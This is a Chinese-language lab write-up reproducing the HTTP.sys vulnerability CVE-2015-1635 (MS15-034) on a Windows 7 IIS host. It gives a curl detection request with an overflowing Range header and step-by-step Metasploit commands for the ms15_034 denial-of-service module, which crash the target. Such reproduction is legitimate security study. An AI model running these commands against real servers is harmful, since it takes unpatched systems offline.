一.漏洞描述
HTTP.sys远程执行代码漏洞 (CVE-2015-1635)
在HTTP协议栈(HTTP.SYS)中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
对于此漏洞,一般都是对目标进行攻击,从而让目标主机死机。当然也可以执行任意代码。
二.漏洞平台
Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2(此漏洞存在IIS6.0以上版本)
在复现过程中,TONG在使用32位的系统时,无法完成复现。这里使用的是64位的系统。
三.环境搭建
• 目标环境:windows7-64位(安装IIS 7.0服务)
• 中间件:IIS
• IP地址:192.168.137.144
• 攻击者环境:kali linux
• 复现工具:MSF
四.漏洞复现
1.检测环境是否搭建成功
在攻击者计算机上访问目标计算机的IP地址,web上出现这样的画面,表示IIS搭建成功。
2.检测漏洞是否存在
在kali linux中输入:
curl http://192.168.137.144 -H “Host: 192.168.137.144” -H “Range: bytes=0-18446744073709551615”
(Range字段值的含义。18446744073709551615转为十六进制是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整型所能表达的最大整数,整数溢出和这个超大整数有关。)
当返回的TITLE中为Requested Range Not Satisfiable 则表示目标存在HTTP.SYS漏洞
如果返回的是Bad Request则表示该漏洞不存在
3.msf利用漏洞
(1)输入msfconsole打开msf
(2)输入search ms15-034查询该漏洞
(3)使用模块攻击
在这里选择:auxiliary/dos/http/ms15_034_ulonglongadd 模块攻击
依次输入
• use auxiliary/dos/http/ms15_034_ulonglongadd
• show options
• set rhosts 192.168.137.144
• set threads 10
• run
(4)查看攻击是否成功
回到目标计算机上出现蓝屏死机,表示我们成功攻击目标,使其死机。